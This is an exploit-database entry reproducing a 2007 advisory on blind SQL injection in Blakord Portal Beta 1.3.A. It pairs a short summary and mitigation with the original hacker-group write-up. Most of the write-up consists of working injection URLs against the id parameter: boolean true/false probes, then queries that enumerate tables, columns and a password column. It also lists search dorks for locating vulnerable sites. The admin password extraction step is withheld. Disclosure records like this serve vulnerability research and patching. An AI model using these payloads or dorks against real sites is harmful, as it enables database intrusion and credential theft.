Blakord Portal Blind SQL Injection

vendor:

Blakord Portal

by:

JosS

7.5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: Blakord Portal

Affected Version From: Beta 1.3.A

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Blakord Portal Blind SQL Injection

Blakord Portal <= Beta 1.3.A (all modules) is vulnerable to blind SQL injection. An attacker can manipulate the SQL queries to extract sensitive information from the database. The vulnerability allows an attacker to execute arbitrary SQL commands.

Mitigation:

The vendor should sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+            Blakord Portal <= Beta 1.3.A (all modules) Blind Sql Injection          +==--
--==+====================================================================================+==--
                     [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

[+] Info:

[~] Software: Blakord Portal
[~] HomePage: http://www.cdv3k.com
[~] Exploit: Blind Sql Injection [High]
[~] Where: All Modules
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Dork: "Power by Blakord Portal"
[~] Dork2: "Powered by Blakord Portal"
[~] Dork3: "Blakord Portal"

[+] Compression:

[~] True: http://localhost/[path]/[any module]?id=1 and 1=1
[~] False: http://localhost/[path]/[any module]?id=1 and 1=2

[+] Exploding:

[*] Checking table: 

[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) >= 0
[~] Exploit2: http://localhost/[path]/[any module]?id=1 and exists (select * from [TABLE])
[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) >= 0
[~] Example2: http://localhost/[path]/[any module]?id=1 and exists (select * from users)
[~] If you don't see any error, it is tha table exist.

[*] Checking columns number of table:

[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) = [NUMBER]
[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) = 6
[~] If you don't see any error, the table has 6 columns.

[*] Checking columns of table:

[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count([COLUMN]) FROM [TABLE]) >= 0
[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(U_PASSWORD) FROM users) >= 0
[~] If you don't see any error, the column exists.

[*] Admin Password; Noob or Lammer?:

[~] Exploit: Priv8
[~] Example: Priv8
[~] Priv8 , xD.

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                       JosS                                         +==--
--==+====================================================================================+==--
                                       [+] [The End]

# milw0rm.com [2007-12-26]